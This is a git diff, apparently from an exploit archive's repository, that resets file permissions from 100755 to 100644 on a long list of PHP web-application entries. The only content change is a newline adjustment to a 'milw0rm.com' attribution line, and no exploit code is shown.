a/platforms/php/webapps/6985.txt b/platforms/php/webapps/6985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6986.txt b/platforms/php/webapps/6986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6987.txt b/platforms/php/webapps/6987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6988.txt b/platforms/php/webapps/6988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6989.txt b/platforms/php/webapps/6989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6990.txt b/platforms/php/webapps/6990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6991.txt b/platforms/php/webapps/6991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6992.txt b/platforms/php/webapps/6992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6993.php b/platforms/php/webapps/6993.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6995.txt b/platforms/php/webapps/6995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6996.php b/platforms/php/webapps/6996.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6997.txt b/platforms/php/webapps/6997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6998.txt b/platforms/php/webapps/6998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6999.txt b/platforms/php/webapps/6999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7000.txt b/platforms/php/webapps/7000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7001.txt b/platforms/php/webapps/7001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7002.txt b/platforms/php/webapps/7002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7003.txt b/platforms/php/webapps/7003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7004.txt b/platforms/php/webapps/7004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7005.txt b/platforms/php/webapps/7005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7007.txt b/platforms/php/webapps/7007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7008.txt b/platforms/php/webapps/7008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7009.txt b/platforms/php/webapps/7009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7010.txt b/platforms/php/webapps/7010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7012.txt b/platforms/php/webapps/7012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7013.txt b/platforms/php/webapps/7013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7014.txt b/platforms/php/webapps/7014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7015.txt b/platforms/php/webapps/7015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7016.txt b/platforms/php/webapps/7016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7017.txt b/platforms/php/webapps/7017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7018.txt b/platforms/php/webapps/7018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7019.txt b/platforms/php/webapps/7019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7020.txt b/platforms/php/webapps/7020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7021.txt b/platforms/php/webapps/7021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7022.txt b/platforms/php/webapps/7022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7023.txt b/platforms/php/webapps/7023.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7024.txt b/platforms/php/webapps/7024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7025.txt b/platforms/php/webapps/7025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7026.txt b/platforms/php/webapps/7026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7027.txt b/platforms/php/webapps/7027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7028.txt b/platforms/php/webapps/7028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7029.txt b/platforms/php/webapps/7029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7030.txt b/platforms/php/webapps/7030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7031.php b/platforms/php/webapps/7031.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7032.txt b/platforms/php/webapps/7032.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7033.txt b/platforms/php/webapps/7033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7034.txt b/platforms/php/webapps/7034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7035.txt b/platforms/php/webapps/7035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7038.txt b/platforms/php/webapps/7038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7039.txt b/platforms/php/webapps/7039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7040.txt b/platforms/php/webapps/7040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7041.txt b/platforms/php/webapps/7041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7042.txt b/platforms/php/webapps/7042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7043.txt b/platforms/php/webapps/7043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7044.txt b/platforms/php/webapps/7044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7045.txt b/platforms/php/webapps/7045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7046.txt b/platforms/php/webapps/7046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7047.txt b/platforms/php/webapps/7047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7048.txt b/platforms/php/webapps/7048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7049.txt b/platforms/php/webapps/7049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7050.txt b/platforms/php/webapps/7050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7052.txt b/platforms/php/webapps/7052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7053.txt b/platforms/php/webapps/7053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7058.txt b/platforms/php/webapps/7058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7059.txt b/platforms/php/webapps/7059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7061.txt b/platforms/php/webapps/7061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7062.txt b/platforms/php/webapps/7062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7063.txt b/platforms/php/webapps/7063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7065.txt b/platforms/php/webapps/7065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7066.txt b/platforms/php/webapps/7066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7068.txt b/platforms/php/webapps/7068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7069.txt b/platforms/php/webapps/7069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7070.txt b/platforms/php/webapps/7070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7071.txt b/platforms/php/webapps/7071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7072.txt b/platforms/php/webapps/7072.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7074.txt b/platforms/php/webapps/7074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7076.txt b/platforms/php/webapps/7076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7077.txt b/platforms/php/webapps/7077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7078.txt b/platforms/php/webapps/7078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7079.txt b/platforms/php/webapps/7079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7080.txt b/platforms/php/webapps/7080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7081.txt b/platforms/php/webapps/7081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7082.txt b/platforms/php/webapps/7082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7083.txt b/platforms/php/webapps/7083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7084.txt b/platforms/php/webapps/7084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7085.txt b/platforms/php/webapps/7085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7086.txt b/platforms/php/webapps/7086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7087.txt b/platforms/php/webapps/7087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7089.txt b/platforms/php/webapps/7089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7092.txt b/platforms/php/webapps/7092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7093.txt b/platforms/php/webapps/7093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7094.txt b/platforms/php/webapps/7094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7095.txt b/platforms/php/webapps/7095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7096.txt b/platforms/php/webapps/7096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7097.txt b/platforms/php/webapps/7097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7098.txt b/platforms/php/webapps/7098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7101.txt b/platforms/php/webapps/7101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7102.txt b/platforms/php/webapps/7102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7103.txt b/platforms/php/webapps/7103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7105.txt b/platforms/php/webapps/7105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7106.txt b/platforms/php/webapps/7106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7107.txt b/platforms/php/webapps/7107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7110.txt b/platforms/php/webapps/7110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7111.txt b/platforms/php/webapps/7111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7112.txt b/platforms/php/webapps/7112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7113.txt b/platforms/php/webapps/7113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7114.txt b/platforms/php/webapps/7114.txt old mode 100755 new mode 100644 index 66068c2dc..a553c7fa3 --- a/platforms/php/webapps/7114.txt +++ b/platforms/php/webapps/7114.txt @@ -152,4 +152,4 @@ sub usage { exit; } -# milw0rm.com [2008-11-13] \ No newline at end of file +# milw0rm.com [2008-11-13] \ No newline at end of file diff --git a/platforms/php/webapps/7116.txt b/platforms/php/webapps/7116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7117.txt b/platforms/php/webapps/7117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7118.txt b/platforms/php/webapps/7118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7119.php b/platforms/php/webapps/7119.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7122.txt b/platforms/php/webapps/7122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7123.txt b/platforms/php/webapps/7123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7124.txt b/platforms/php/webapps/7124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7128.txt b/platforms/php/webapps/7128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7130.php b/platforms/php/webapps/7130.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7131.txt b/platforms/php/webapps/7131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7133.txt b/platforms/php/webapps/7133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7134.txt b/platforms/php/webapps/7134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7136.txt b/platforms/php/webapps/7136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7138.txt b/platforms/php/webapps/7138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7140.txt b/platforms/php/webapps/7140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7143.txt b/platforms/php/webapps/7143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7144.txt b/platforms/php/webapps/7144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7146.txt b/platforms/php/webapps/7146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7147.txt b/platforms/php/webapps/7147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7148.txt b/platforms/php/webapps/7148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7149.php b/platforms/php/webapps/7149.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7152.txt b/platforms/php/webapps/7152.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7153.txt b/platforms/php/webapps/7153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7155.txt b/platforms/php/webapps/7155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7156.txt b/platforms/php/webapps/7156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7157.txt b/platforms/php/webapps/7157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7158.txt b/platforms/php/webapps/7158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7159.php b/platforms/php/webapps/7159.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7160.php b/platforms/php/webapps/7160.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7163.txt b/platforms/php/webapps/7163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7164.txt b/platforms/php/webapps/7164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7166.txt b/platforms/php/webapps/7166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7170.php b/platforms/php/webapps/7170.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7172.txt b/platforms/php/webapps/7172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7173.php b/platforms/php/webapps/7173.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7174.txt b/platforms/php/webapps/7174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7175.txt b/platforms/php/webapps/7175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7176.txt b/platforms/php/webapps/7176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7179.txt b/platforms/php/webapps/7179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7180.txt b/platforms/php/webapps/7180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7182.txt b/platforms/php/webapps/7182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7184.txt b/platforms/php/webapps/7184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7185.php b/platforms/php/webapps/7185.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7186.txt b/platforms/php/webapps/7186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7188.txt b/platforms/php/webapps/7188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7189.txt b/platforms/php/webapps/7189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7190.txt b/platforms/php/webapps/7190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7191.php b/platforms/php/webapps/7191.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7195.txt b/platforms/php/webapps/7195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7197.txt b/platforms/php/webapps/7197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7198.txt b/platforms/php/webapps/7198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7199.txt b/platforms/php/webapps/7199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7200.txt b/platforms/php/webapps/7200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7201.txt b/platforms/php/webapps/7201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7202.txt b/platforms/php/webapps/7202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7204.txt b/platforms/php/webapps/7204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7205.txt b/platforms/php/webapps/7205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7206.txt b/platforms/php/webapps/7206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7208.txt b/platforms/php/webapps/7208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7210.txt b/platforms/php/webapps/7210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7211.php b/platforms/php/webapps/7211.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7212.php b/platforms/php/webapps/7212.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7214.txt b/platforms/php/webapps/7214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7215.txt b/platforms/php/webapps/7215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7216.txt b/platforms/php/webapps/7216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7218.txt b/platforms/php/webapps/7218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7221.txt b/platforms/php/webapps/7221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7222.txt b/platforms/php/webapps/7222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7223.txt b/platforms/php/webapps/7223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7224.txt b/platforms/php/webapps/7224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7225.txt b/platforms/php/webapps/7225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7227.txt b/platforms/php/webapps/7227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7228.txt b/platforms/php/webapps/7228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7229.txt b/platforms/php/webapps/7229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7231.txt b/platforms/php/webapps/7231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7232.txt b/platforms/php/webapps/7232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7233.txt b/platforms/php/webapps/7233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7234.txt b/platforms/php/webapps/7234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7235.txt b/platforms/php/webapps/7235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7237.txt b/platforms/php/webapps/7237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7238.txt b/platforms/php/webapps/7238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7239.txt b/platforms/php/webapps/7239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7240.txt b/platforms/php/webapps/7240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7241.txt b/platforms/php/webapps/7241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7242.txt b/platforms/php/webapps/7242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7243.php b/platforms/php/webapps/7243.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7244.txt b/platforms/php/webapps/7244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7245.txt b/platforms/php/webapps/7245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7246.txt b/platforms/php/webapps/7246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7247.txt b/platforms/php/webapps/7247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7248.txt b/platforms/php/webapps/7248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7250.txt b/platforms/php/webapps/7250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7251.txt b/platforms/php/webapps/7251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7252.txt b/platforms/php/webapps/7252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7253.txt b/platforms/php/webapps/7253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7254.txt b/platforms/php/webapps/7254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7255.txt b/platforms/php/webapps/7255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7256.txt b/platforms/php/webapps/7256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7258.txt b/platforms/php/webapps/7258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7260.txt b/platforms/php/webapps/7260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7261.txt b/platforms/php/webapps/7261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7263.txt b/platforms/php/webapps/7263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7265.txt b/platforms/php/webapps/7265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7267.txt b/platforms/php/webapps/7267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7268.txt b/platforms/php/webapps/7268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7270.txt b/platforms/php/webapps/7270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7271.txt b/platforms/php/webapps/7271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7284.txt b/platforms/php/webapps/7284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7285.txt b/platforms/php/webapps/7285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7286.txt b/platforms/php/webapps/7286.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7289.txt b/platforms/php/webapps/7289.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7290.txt b/platforms/php/webapps/7290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7298.txt b/platforms/php/webapps/7298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7299.txt b/platforms/php/webapps/7299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7301.txt b/platforms/php/webapps/7301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7302.txt b/platforms/php/webapps/7302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7303.txt b/platforms/php/webapps/7303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7305.txt b/platforms/php/webapps/7305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7306.txt b/platforms/php/webapps/7306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7308.txt b/platforms/php/webapps/7308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7310.txt b/platforms/php/webapps/7310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7311.txt b/platforms/php/webapps/7311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7312.txt b/platforms/php/webapps/7312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7315.txt b/platforms/php/webapps/7315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7318.txt b/platforms/php/webapps/7318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7319.txt b/platforms/php/webapps/7319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7323.txt b/platforms/php/webapps/7323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7324.txt b/platforms/php/webapps/7324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7332.txt b/platforms/php/webapps/7332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7333.txt b/platforms/php/webapps/7333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7335.txt b/platforms/php/webapps/7335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7336.txt b/platforms/php/webapps/7336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7337.txt b/platforms/php/webapps/7337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7338.txt b/platforms/php/webapps/7338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7339.txt b/platforms/php/webapps/7339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7341.txt b/platforms/php/webapps/7341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7342.txt b/platforms/php/webapps/7342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7343.txt b/platforms/php/webapps/7343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7344.txt b/platforms/php/webapps/7344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7345.txt b/platforms/php/webapps/7345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7346.txt b/platforms/php/webapps/7346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7351.txt b/platforms/php/webapps/7351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7352.txt b/platforms/php/webapps/7352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7354.txt b/platforms/php/webapps/7354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7363.txt b/platforms/php/webapps/7363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7364.php b/platforms/php/webapps/7364.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7365.php b/platforms/php/webapps/7365.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7366.php b/platforms/php/webapps/7366.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7367.php b/platforms/php/webapps/7367.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7368.txt b/platforms/php/webapps/7368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/737.txt b/platforms/php/webapps/737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7374.txt b/platforms/php/webapps/7374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7375.txt b/platforms/php/webapps/7375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7377.txt b/platforms/php/webapps/7377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7379.txt b/platforms/php/webapps/7379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7380.txt b/platforms/php/webapps/7380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7381.txt b/platforms/php/webapps/7381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7382.txt b/platforms/php/webapps/7382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7383.txt b/platforms/php/webapps/7383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7385.txt b/platforms/php/webapps/7385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7388.txt b/platforms/php/webapps/7388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7392.txt b/platforms/php/webapps/7392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7395.txt b/platforms/php/webapps/7395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7396.txt b/platforms/php/webapps/7396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7397.txt b/platforms/php/webapps/7397.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7399.txt b/platforms/php/webapps/7399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7400.txt b/platforms/php/webapps/7400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7406.php b/platforms/php/webapps/7406.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7407.txt b/platforms/php/webapps/7407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7408.txt b/platforms/php/webapps/7408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7409.txt b/platforms/php/webapps/7409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7411.txt b/platforms/php/webapps/7411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7417.txt b/platforms/php/webapps/7417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7418.txt b/platforms/php/webapps/7418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7421.txt b/platforms/php/webapps/7421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7422.txt b/platforms/php/webapps/7422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7426.txt b/platforms/php/webapps/7426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7430.txt b/platforms/php/webapps/7430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7432.txt b/platforms/php/webapps/7432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7433.txt b/platforms/php/webapps/7433.txt old 